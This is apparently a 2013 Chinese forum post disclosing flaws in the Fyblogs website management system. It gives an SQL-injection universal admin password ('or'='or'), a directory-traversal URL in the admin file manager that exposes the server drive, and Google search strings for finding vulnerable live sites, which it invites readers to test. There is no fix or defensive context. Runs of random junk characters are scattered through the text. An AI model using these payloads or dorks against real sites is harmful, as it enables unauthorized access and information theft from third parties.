漏洞类型: 未授权访问/权限绕过' n6 b4 r$ _) y4 B
7 t+ B& ?6 e7 z. M/ P
简要描述:
+ H U( q6 \7 d1 X1 u6 q6 w: Y" h# M) d. }5 B( D) {% a
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( }% k8 U! ]/ f0 L5 m
8 x) K8 G& t* L. q6 j" N详细说明:
! [7 [0 A# V- v" i3 T& k8 [
- B4 c* U: \' ?2 }9 D# @后台万能密码 'or'='or'
$ P) d; {" P' F& I( c+ e后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
. ]) n; Z& S" I# c) Badmin/uploadfile.asp?currentFolder=/upfiles/../
8 s* c" B% }" F9 t6 n! k8 }; l6 E! x
漏洞证明:' S0 X" t7 e( l; o
6 h3 k- }( K# T6 A: g谷歌:inurl:type.asp?id=1 新闻中心
1 w% @' h- I. P6 B5 f或者 :inurl:download_ok.asp?
/ K/ B$ w& c/ i& G6 Q# M/ x
K! B7 k& B# r' J7 s+ M可以测试
/ s9 y# `' D' h* R3 k) n" o; P8 V7 |4 A! ?7 L$ F$ m) Y
- E: H/ ^# _2 O6 F0 P
|
发表于 2013-3-7 13:07:46
收藏
支持
反对